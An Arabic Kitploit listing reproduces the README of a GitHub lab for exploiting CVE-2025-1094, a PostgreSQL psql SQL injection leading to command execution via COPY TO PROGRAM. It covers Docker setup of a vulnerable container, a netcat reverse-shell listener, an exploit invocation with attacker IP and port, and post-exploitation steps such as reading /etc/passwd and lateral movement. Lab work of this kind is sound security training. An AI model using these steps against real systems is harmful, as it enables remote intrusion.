Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/pinkarmor/cve-2025-1094-lab-setup
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubpinkarmor/cve-2025-1094-lab-setup

CVE-2025-1094-Lab-Setup

# مختبر عملي لاستغلال CVE-2025-1094، ثغرة حقن SQL في PostgreSQL psql تؤدي إلى تنفيذ أوامر عن بُعد عبر COPY TO PROGRAM، مع إعداد Docker وحمولة قشرة عكسية.

عرض المستودع
منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛠️ إعداد مختبر CVE-2025-1094

⚠️ إخلاء مسؤولية
هذا المختبر مخصص لأغراض تعليمية وبحثية فقط.
لا تستخدم أيًا من المعلومات أو التقنيات الموضحة هنا على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الاستخدام غير المصرح به لهذه الأساليب قد ينتهك القوانين ويؤدي إلى عقوبات شديدة.


📌 نظرة عامة

CVE-2025-1094 هو ثغرة أمنية حرجة تؤثر على أداة PostgreSQL التفاعلية psql، وقد تم اكتشافها في الإصدار 14.15 والإصدارات الأقدم.
تسمح للمهاجمين بتنفيذ حقن SQL مما قد يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) في ظل ظروف معينة.


🧨 السبب الجذري

تنشأ الثغرة من المعالجة غير السليمة لمدخلات UTF-8 التالفة في psql.
بسبب عدم كفاية التحقق، يمكن للمهاجمين حقن استعلامات SQL عشوائية أو أوامر وصفية مثل ! (هروب الصدفة)، وحتى استغلال COPY ... TO PROGRAM لتنفيذ أوامر النظام.


🔥 التأثير وسيناريوهات الهجوم

  • حقن SQL ← تنفيذ التعليمات البرمجية عن بُعد (RCE): تتجاوز سلاسل UTF-8 التالفة التحقق وتؤدي إلى تنفيذ استعلامات عشوائية.
  • إساءة استخدام COPY TO PROGRAM: يمكن للمهاجمين تنفيذ أوامر صدفة عشوائية مثل:
    • قذائف عكسية (Reverse shells)
    • قراءة ملفات حساسة (/etc/passwd)
    • الدمج مع ثغرات CVE أخرى لتنفيذ RCE كامل بدون مصادقة
  • خطر التكامل: البرامج التي تستخدم psql مع مدخلات غير موثوقة (مثل BeyondTrust PRA و Remote Support) معرضة بشكل خاص.

🧪 متطلبات المختبر

🐳 الضحية (Ubuntu)

تثبيت Docker:

root@kitploit:~
sudo apt update
sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io
sudo systemctl enable --now docker
sudo usermod -aG docker $USER

👉 أعد التشغيل أو سجّل الخروج ثم سجّل الدخول مرة أخرى لتطبيق صلاحيات مجموعة Docker.


🐍 المهاجم (Kali)

تثبيت Python والاعتماديات:

root@kitploit:~
sudo apt install -y python3 python3-pip python3-psycopg2 netcat-traditional

✅ تأكد من الاتصال الشبكي بين جهاز المهاجم والضحية.


⚙️ الخطوة 1 – نشر حاوية PostgreSQL الضعيفة (الضحية)

  1. سحب صورة PostgreSQL 14.15:
root@kitploit:~
docker pull postgres:14.15
  1. تشغيل الحاوية:
root@kitploit:~
docker run --name vulnerable_postgres   -e POSTGRES_USER=postgres123   -e POSTGRES_PASSWORD=StrongP@ssWord   -e POSTGRES_DB=labdb   -p 5432:5432   -d postgres:14.15
  1. انتظر ~5 ثوانٍ للتهيئة، ثم أنشئ جدولًا تجريبيًا:
root@kitploit:~
docker exec -i vulnerable_postgres psql -U postgres123 -d labdb <<EOF
CREATE TABLE users (
  id SERIAL PRIMARY KEY,
  username TEXT,
  password TEXT
);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF

✅ الخطوة 1.5 – التحقق من إعداد الحاوية وقاعدة البيانات

بعد بدء تشغيل الحاوية، تحقق من أن كل شيء يعمل باستخدام الأوامر التالية:

1. تحقق من أن حاوية PostgreSQL قيد التشغيل:

root@kitploit:~
sudo docker ps

📌 يجب أن ترى حاوية باسم vulnerable_postgres تستمع على المنفذ 5432.


2. الوصول إلى الحاوية وفحص قاعدة البيانات:

root@kitploit:~
sudo docker exec -it vulnerable_postgres psql -U postgres123 -d labdb

داخل قشرة psql، قم بتشغيل:

root@kitploit:~
SELECT * FROM users;

المخرجات المتوقعة:

root@kitploit:~
 id | username |  password
----+----------+-------------
  1 | admin    | password123
(1 row)

الخروج من psql:

root@kitploit:~
\q

✅ الآن مثيل PostgreSQL الضعيف لديك يعمل وجاهز للاستغلال.


3. إعادة تشغيل الحاوية

root@kitploit:~
sudo docker start vulnerable_postgres

📡 الخطوة 2 – الاستغلال من جهاز المهاجم

  1. ابدأ مستمعًا على جهاز المهاجم لالتقاط القشرة العكسية:
root@kitploit:~
nc -lvnp 4444
  1. قم بتشغيل سكربت الاستغلال (عدّل عنوان IP والمنفذ إذا لزم الأمر):
root@kitploit:~
python3 exploit.py <Victim_IP> <Attacker_IP> <Attacker_PORT>
  1. إذا نجحت العملية، ستستلم قشرة عكسية من حاوية PostgreSQL الضعيفة 🎉
root@kitploit:~
[*] Connecting to PostgreSQL server...
[+] Connected successfully!
[*] Sending payload...
[✓] Payload executed! Check your Netcat listener for a shell.

🧰 مثال على تدفق الاستغلال

  1. حقن UTF-8 تالف لتجاوز التحقق من المدخلات
  2. استغلال COPY ... TO PROGRAM لتنفيذ أوامر صدفة عشوائية
  3. تتصل القشرة العكسية بجهاز المهاجم
  4. تصعيد الصلاحيات أو التحرك جانبيًا داخل البيئة

💡 نصيحة: يمكنك إنشاء لقطة من هذه الحاوية الضعيفة وإعادة استخدامها لاحقًا دون إعادة بناء البيئة.

تنزيل الأداة